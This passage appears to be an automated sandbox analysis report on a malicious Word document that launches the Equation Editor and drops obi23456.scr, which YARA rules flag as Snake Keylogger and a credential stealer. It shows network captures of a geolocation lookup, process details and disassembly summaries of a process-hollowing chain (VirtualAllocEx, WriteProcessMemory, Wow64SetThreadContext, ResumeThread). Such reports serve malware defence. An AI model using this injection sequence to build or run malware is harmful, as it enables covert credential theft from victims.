            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-05 00:58:09 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            16192.168.2.2249183188.114.97.34433404C:\Users\user\AppData\Roaming\obi23456.scr
            TimestampBytes transferredDirectionData
            2024-07-05 00:58:11 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            2024-07-05 00:58:11 UTC712INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:11 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 54917
            Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1hzybx3ZpNy9udf0M2PY5FpN%2FQ%2FCsCxfSkrSBWN07d0zyvHGg3iytVenutwTX6MGCH3ex4IaHugKGk09jMW%2F6pngsi6A%2BO2JTudn71QwuwJU%2FdFNafjuuMGlQB%2B7A3G2gu357EJ3"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 89e367bc49831825-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:58:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-05 00:58:11 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            17192.168.2.2249185188.114.97.34433404C:\Users\user\AppData\Roaming\obi23456.scr
            TimestampBytes transferredDirectionData
            2024-07-05 00:58:12 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            Connection: Keep-Alive
            2024-07-05 00:58:12 UTC706INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:12 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 54918
            Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qasa4B5eSCyTrZjDBHWwQqiOCnhE%2FQykukwQz2Ks54EUPa1XI0aVUwER%2FmFoU3fG8lBe01FqePxhmmDkpq8dsQuY9siYDeFKobvVkqpIq7cjS8IE5skDYOSMn4xMPH%2FEbYHx3RaK"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 89e367c4ac054246-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:58:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-05 00:58:12 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:20:57:43
            Start date:04/07/2024
            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Imagebase:0x13f3b0000
            File size:1'423'704 bytes
            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:8
            Start time:20:57:55
            Start date:04/07/2024
            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Wow64 process (32bit):true
            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Imagebase:0x400000
            File size:543'304 bytes
            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:9
            Start time:20:57:57
            Start date:04/07/2024
            Path:C:\Users\user\AppData\Roaming\obi23456.scr
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\AppData\Roaming\obi23456.scr"
            Imagebase:0x2b0000
            File size:520'704 bytes
            MD5 hash:F7BDADAFF67E573F145D2E8E32E32CD8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000009.00000002.374594204.0000000000780000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            • Detection: 58%, ReversingLabs
            • Detection: 51%, Virustotal, Browse
            Reputation:low
            Has exited:true

            General

            Target ID:10
            Start time:20:57:57
            Start date:04/07/2024
            Path:C:\Users\user\AppData\Roaming\obi23456.scr
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\AppData\Roaming\obi23456.scr"
            Imagebase:0x2b0000
            File size:520'704 bytes
            MD5 hash:F7BDADAFF67E573F145D2E8E32E32CD8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.897811172.00000000024FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:low
            Has exited:false

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:28.9%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:27.3%
              Total number of Nodes:44
              Total number of Limit Nodes:1
              execution_graph 5332 264da0 5333 264e2d CreateProcessW 5332->5333 5335 264f86 5333->5335 5336 2641b0 5337 2641ca 5336->5337 5338 26421a 5337->5338 5340 26425f 5337->5340 5341 2642a3 5340->5341 5360 263fa0 5341->5360 5364 263f98 5341->5364 5342 264771 5368 263e48 5342->5368 5372 263e40 5342->5372 5343 264a50 5356 263e40 WriteProcessMemory 5343->5356 5357 263e48 WriteProcessMemory 5343->5357 5344 264855 5344->5343 5352 263e40 WriteProcessMemory 5344->5352 5353 263e48 WriteProcessMemory 5344->5353 5345 264a8e 5346 264b76 5345->5346 5376 263d18 5345->5376 5380 263d20 5345->5380 5384 2640c0 5346->5384 5388 2640b9 5346->5388 5347 264c33 5347->5337 5352->5344 5353->5344 5356->5345 5357->5345 5361 263fe4 VirtualAllocEx 5360->5361 5363 26405c 5361->5363 5363->5342 5365 263fe4 VirtualAllocEx 5364->5365 5367 26405c 5365->5367 5367->5342 5369 263e94 WriteProcessMemory 5368->5369 5371 263f2d 5369->5371 5371->5344 5373 263e94 WriteProcessMemory 5372->5373 5375 263f2d 5373->5375 5375->5344 5377 263d69 Wow64SetThreadContext 5376->5377 5379 263de1 5377->5379 5379->5346 5381 263d69 Wow64SetThreadContext 5380->5381 5383 263de1 5381->5383 5383->5346 5385 264104 ResumeThread 5384->5385 5387 264150 5385->5387 5387->5347 5389 264104 ResumeThread 5388->5389 5391 264150 5389->5391 5391->5347 5392 2651d0 ReadProcessMemory 5393 26528f 5392->5393

              Executed Functions

              Function 0026425F Relevance: 1.9, Strings: 1, Instructions: 624COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1648 26425f-2642a1 1649 2642a3 1648->1649 1650 2642a8-26442e 1648->1650 1649->1650 1657 264455-26449a call 263694 1650->1657 1658 264430-264454 1650->1658 1662 2644c3-26452d 1657->1662 1663 26449c-2644b8 1657->1663 1658->1657 1669 264534-264560 1662->1669 1670 26452f 1662->1670 1663->1662 1672 264562-264594 call 2636a0 1669->1672 1673 2645c1-2645f3 call 2636ac 1669->1673 1670->1669 1680 264596-2645b2 1672->1680 1681 2645bd-2645bf 1672->1681 1678 2645f5-264611 1673->1678 1679 26461c 1673->1679 1678->1679 1682 26461d-264627 1679->1682 1680->1681 1681->1682 1683 26462e-264674 call 2636b8 1682->1683 1684 264629 1682->1684 1691 264676-264692 1683->1691 1692 26469d-2646b6 1683->1692 1684->1683 1691->1692 1693 26470e-26476c 1692->1693 1694 2646b8-2646e4 call 2636c4 1692->1694 1772 26476f call 263fa0 1693->1772 1773 26476f call 263f98 1693->1773 1700 2646e6-264702 1694->1700 1701 26470d 1694->1701 1700->1701 1701->1693 1704 264771-264786 1706 26479b-26479d 1704->1706 1707 264788-264799 1704->1707 1708 2647a3-2647b7 1706->1708 1707->1708 1709 2647f4-26480b 1708->1709 1710 2647b9-2647f3 1708->1710 1711 264834-264850 1709->1711 1712 26480d-264829 1709->1712 1710->1709 1770 264853 call 263e40 1711->1770 1771 264853 call 263e48 1711->1771 1712->1711 1715 264855-264875 1716 264877-264893 1715->1716 1717 26489e-2648d3 1715->1717 1716->1717 1721 264a2b-264a4a 1717->1721 1723 264a50-264a89 1721->1723 1724 2648d8-26495c 1721->1724 1778 264a8c call 263e40 1723->1778 1779 264a8c call 263e48 1723->1779 1734 264962-2649d1 1724->1734 1735 264a20-264a25 1724->1735 1727 264a8e-264aae 1729 264ad7-264b0a 1727->1729 1730 264ab0-264acc 1727->1730 1736 264b14-264b27 1729->1736 1737 264b0c-264b13 1729->1737 1730->1729 1774 2649d4 call 263e40 1734->1774 1775 2649d4 call 263e48 1734->1775 1735->1721 1739 264b2e-264b59 1736->1739 1740 264b29 1736->1740 1737->1736 1744 264bc3-264bf5 call 2636d0 1739->1744 1745 264b5b-264b71 1739->1745 1740->1739 1754 264bf7-264c13 1744->1754 1755 264c1e 1744->1755 1776 264b74 call 263d20 1745->1776 1777 264b74 call 263d18 1745->1777 1746 2649d6-2649f6 1749 264a1f 1746->1749 1750 2649f8-264a14 1746->1750 1748 264b76-264b96 1752 264bbf-264bc1 1748->1752 1753 264b98-264bb4 1748->1753 1749->1735 1750->1749 1757 264c1f-264c2e 1752->1757 1753->1752 1754->1755 1755->1757 1780 264c31 call 2640c0 1757->1780 1781 264c31 call 2640b9 1757->1781 1761 264c33-264c53 1764 264c55-264c71 1761->1764 1765 264c7c-264d85 1761->1765 1764->1765 1770->1715 1771->1715 1772->1704 1773->1704 1774->1746 1775->1746 1776->1748 1777->1748 1778->1727 1779->1727 1780->1761 1781->1761
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.374253933.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_260000_obi23456.jbxd
              Similarity
              • API ID:
              • String ID: (
              • API String ID: 0-3887548279
              • Opcode ID: 7bdd898e388367819110d1cdfc75155ce88da74d42612becd6d2be7a1fd5ad69
              • Instruction ID: ddf510ddc7196c0c1829a9f9a9657fffda7c79b028274b8d2d32271611ab7087
              • Opcode Fuzzy Hash: 7bdd898e388367819110d1cdfc75155ce88da74d42612becd6d2be7a1fd5ad69
              • Instruction Fuzzy Hash: 1352C075E112288FDB68DF65C994BDDBBB2AF89300F1081EAD409A7291DB746EC5CF40
              Function 00264D95 Relevance: 1.7, APIs: 1, Instructions: 222processCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1782 264d95-264e2b 1783 264e42-264e50 1782->1783 1784 264e2d-264e3f 1782->1784 1785 264e67-264ea3 1783->1785 1786 264e52-264e64 1783->1786 1784->1783 1787 264eb7-264f84 CreateProcessW 1785->1787 1788 264ea5-264eb4 1785->1788 1786->1785 1792 264f86-264f8c 1787->1792 1793 264f8d-26504c 1787->1793 1788->1787 1792->1793 1803 265082-26508d 1793->1803 1804 26504e-265077 1793->1804 1807 26508e 1803->1807 1804->1803 1807->1807
              APIs
              • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00264F71
              Memory Dump Source
              • Source File: 00000009.00000002.374253933.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_260000_obi23456.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: 1ff2666abb28dfd4660af8e2ed64cabd560cc97fca0c15d175aba91c9d10fa17
              • Instruction ID: e7c358ac8dd2858c829d273e89e0a3333424eee05f7f7f53dd3c083b1462431a
              • Opcode Fuzzy Hash: 1ff2666abb28dfd4660af8e2ed64cabd560cc97fca0c15d175aba91c9d10fa17
              • Instruction Fuzzy Hash: 7881C274D00259CFEB24DFA5D880BDDBBB5BF49300F1091AAE548B7260D7349A89CF54
              Function 00264DA0 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1809 264da0-264e2b 1810 264e42-264e50 1809->1810 1811 264e2d-264e3f 1809->1811 1812 264e67-264ea3 1810->1812 1813 264e52-264e64 1810->1813 1811->1810 1814 264eb7-264f84 CreateProcessW 1812->1814 1815 264ea5-264eb4 1812->1815 1813->1812 1819 264f86-264f8c 1814->1819 1820 264f8d-26504c 1814->1820 1815->1814 1819->1820 1830 265082-26508d 1820->1830 1831 26504e-265077 1820->1831 1834 26508e 1830->1834 1831->1830 1834->1834
              APIs
              • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00264F71
              Memory Dump Source
              • Source File: 00000009.00000002.374253933.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_260000_obi23456.jbxd
              Similarity
              • API ID: CreateProcess
              • String ID:
              • API String ID: 963392458-0
              • Opcode ID: f4a25e74932d4f06e28543242ac97e0ed7a62749be78dad23decb76e5f8740f1
              • Instruction ID: d2814fbf34ae1f92f3e4e546d0f65564dba3b2f9e90785a0c29a63c106eab833
              • Opcode Fuzzy Hash: f4a25e74932d4f06e28543242ac97e0ed7a62749be78dad23decb76e5f8740f1
              • Instruction Fuzzy Hash: 2D81C174D002698FEB24DFA5D880BDDBBB5BB49300F1091AAE548B7260DB749A89CF54
              Function 00263E40 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1836 263e40-263eb3 1838 263eb5-263ec7 1836->1838 1839 263eca-263f2b WriteProcessMemory 1836->1839 1838->1839 1841 263f34-263f86 1839->1841 1842 263f2d-263f33 1839->1842 1842->1841
              APIs
              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00263F1B
              Memory Dump Source
              • Source File: 00000009.00000002.374253933.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_260000_obi23456.jbxd
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: 6a561cf42c81449b742cbe13166956b6d970d9d827dd22c9df116a6c18e00202
              • Instruction ID: c5c9663ec18100e1b764e95a0fc90a6426fb97a0833327bbdf6af4b6791450bc
              • Opcode Fuzzy Hash: 6a561cf42c81449b742cbe13166956b6d970d9d827dd22c9df116a6c18e00202
              • Instruction Fuzzy Hash: D041AAB4D112489FDF00CFA9D984AEEFBB1BB49310F24942AE814B7250D339AA55CF64
              Function 00263E48 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1847 263e48-263eb3 1849 263eb5-263ec7 1847->1849 1850 263eca-263f2b WriteProcessMemory 1847->1850 1849->1850 1852 263f34-263f86 1850->1852 1853 263f2d-263f33 1850->1853 1853->1852
              APIs
              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00263F1B
              Memory Dump Source
              • Source File: 00000009.00000002.374253933.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_260000_obi23456.jbxd
              Similarity
              • API ID: MemoryProcessWrite
              • String ID:
              • API String ID: 3559483778-0
              • Opcode ID: 9bc9acc779902a64fdede3c02329acf0bef47d69a9e4cb562e63dd11a1178c3f
              • Instruction ID: 66af0df4e6ff1b3b00058e22c66feeba9a749c7f0018eaf609769c8f676a3903
              • Opcode Fuzzy Hash: 9bc9acc779902a64fdede3c02329acf0bef47d69a9e4cb562e63dd11a1178c3f
              • Instruction Fuzzy Hash: A241A9B4D012489FCF00CFA9D984AEEFBF1BB49310F20902AE814B7210C339AA55CB64
              Function 00263F98 Relevance: 1.6, APIs: 1, Instructions: 107memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1858 263f98-26405a VirtualAllocEx 1861 264063-2640ad 1858->1861 1862 26405c-264062 1858->1862 1862->1861
              APIs
              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0026404A
              Memory Dump Source
              • Source File: 00000009.00000002.374253933.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_260000_obi23456.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 5442681695da73697bca7740569badf330ecd592ef227c3263b23ce92721208e
              • Instruction ID: c6edd1229a2437d68c14d062817d35bc562dc3efe1d80eefff7d4d846db5e65c
              • Opcode Fuzzy Hash: 5442681695da73697bca7740569badf330ecd592ef227c3263b23ce92721208e
              • Instruction Fuzzy Hash: 8441A8B8D002589FCF10DFA9D884AEEBBB1EB49310F20942AE815B7210C735A956CF55
              Function 002651C8 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1867 2651c8-26528d ReadProcessMemory 1868 265296-2652d4 1867->1868 1869 26528f-265295 1867->1869 1869->1868
              APIs
              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0026527D
              Memory Dump Source
              • Source File: 00000009.00000002.374253933.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_260000_obi23456.jbxd
              Similarity
              • API ID: MemoryProcessRead
              • String ID:
              • API String ID: 1726664587-0
              • Opcode ID: 2e8dccae122cf47546f46fa0091bace03b139475f2584f30693d64888e51290e
              • Instruction ID: 3772c6c4d93a5011947ddb29de3415f401c22de4c7b3f3c470300c0e981470ae
              • Opcode Fuzzy Hash: 2e8dccae122cf47546f46fa0091bace03b139475f2584f30693d64888e51290e
              • Instruction Fuzzy Hash: AB4166B9D04258DFCF10CFAAD884ADEFBB1AB59310F20902AE814B7210C375AA55CF64
              Function 00263FA0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1872 263fa0-26405a VirtualAllocEx 1875 264063-2640ad 1872->1875 1876 26405c-264062 1872->1876 1876->1875
              APIs
              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0026404A
              Memory Dump Source
              • Source File: 00000009.00000002.374253933.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_260000_obi23456.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 4772a979f8a86aa5aefb99470c5f82cb2500eccdccc0036fba684fe71b8518d5
              • Instruction ID: b80943be2b074d7311b03f82b22cf6fde31308290a2ea6d8b7df1bcde867f4b9
              • Opcode Fuzzy Hash: 4772a979f8a86aa5aefb99470c5f82cb2500eccdccc0036fba684fe71b8518d5
              • Instruction Fuzzy Hash: 4C3197B8D00258DFCF10DFA9D884A9EFBB1AB49310F20A42AE814B7310D735A955CF55
              Function 002651D0 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1881 2651d0-26528d ReadProcessMemory 1882 265296-2652d4 1881->1882 1883 26528f-265295 1881->1883 1883->1882
              APIs
              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0026527D
              Memory Dump Source
              • Source File: 00000009.00000002.374253933.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_260000_obi23456.jbxd
              Similarity
              • API ID: MemoryProcessRead
              • String ID:
              • API String ID: 1726664587-0
              • Opcode ID: 28f0190fe4766926704e4c95f0797ddd8764f64e6af311cf5324916b1c77abb5
              • Instruction ID: 9bbff49964bf81ea0ad5f713d2c861a09cd26b37004c1d5efe196412bcc0d272
              • Opcode Fuzzy Hash: 28f0190fe4766926704e4c95f0797ddd8764f64e6af311cf5324916b1c77abb5
              • Instruction Fuzzy Hash: 263157B9D042589FCF10CFAAD884ADEFBB5AB19310F20902AE814B7210D375AA55CF65
              Function 00263D18 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1886 263d18-263d80 1888 263d97-263ddf Wow64SetThreadContext 1886->1888 1889 263d82-263d94 1886->1889 1891 263de1-263de7 1888->1891 1892 263de8-263e34 1888->1892 1889->1888 1891->1892
              APIs
              • Wow64SetThreadContext.KERNEL32(?,?), ref: 00263DCF
              Memory Dump Source
              • Source File: 00000009.00000002.374253933.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_260000_obi23456.jbxd
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: d2df2a71986235ab8bd7177033b3edda8805335967d4292a23c6855b4d8d2492
              • Instruction ID: be4524e1d248edb001860d1e07d9869c0c41901c508df6cc550de10f35a131c4
              • Opcode Fuzzy Hash: d2df2a71986235ab8bd7177033b3edda8805335967d4292a23c6855b4d8d2492
              • Instruction Fuzzy Hash: FD41BFB4D102589FDB10DFA9D884AEEFBF1BF49314F24942AE415B7240C738AA45CF54
              Function 00263D20 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1897 263d20-263d80 1899 263d97-263ddf Wow64SetThreadContext 1897->1899 1900 263d82-263d94 1897->1900 1902 263de1-263de7 1899->1902 1903 263de8-263e34 1899->1903 1900->1899 1902->1903
              APIs
              • Wow64SetThreadContext.KERNEL32(?,?), ref: 00263DCF
              Memory Dump Source
              • Source File: 00000009.00000002.374253933.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_260000_obi23456.jbxd
              Similarity
              • API ID: ContextThreadWow64
              • String ID:
              • API String ID: 983334009-0
              • Opcode ID: fb9150366555fec0c158f7cf0ce60139ea8e5b7f9efe71c0885feacf5273b3fa
              • Instruction ID: 2db04d86a20a406fb4a3bd309055745c77f2e60ef69d1a57811f1abbb85d10f2
              • Opcode Fuzzy Hash: fb9150366555fec0c158f7cf0ce60139ea8e5b7f9efe71c0885feacf5273b3fa
              • Instruction Fuzzy Hash: 2131CEB4D102589FDB10DFA9D884AEEFBF1BF49314F24802AE814B7240C778AA85CF54
              Function 002640B9 Relevance: 1.6, APIs: 1, Instructions: 77threadCOMMON
              Download Yara Rule
              APIs
              • ResumeThread.KERNELBASE(?), ref: 0026413E
              Memory Dump Source
              • Source File: 00000009.00000002.374253933.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_260000_obi23456.jbxd
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: 46ce70a538809afb9e20ecbccebd8f8cedb5342abe11eeb42d233a6c960a10b7
              • Instruction ID: 6ef89801f5bb49e4e6b311f9db912889d69f00bdec524bb7d001328d37c42566
              • Opcode Fuzzy Hash: 46ce70a538809afb9e20ecbccebd8f8cedb5342abe11eeb42d233a6c960a10b7
              • Instruction Fuzzy Hash: A331EBB4D112489FDB10DFAAE884AEEFBB0AF89310F20906AE815B7300C734A945CF55
              Function 002640C0 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
              Download Yara Rule
              APIs
              • ResumeThread.KERNELBASE(?), ref: 0026413E
              Memory Dump Source
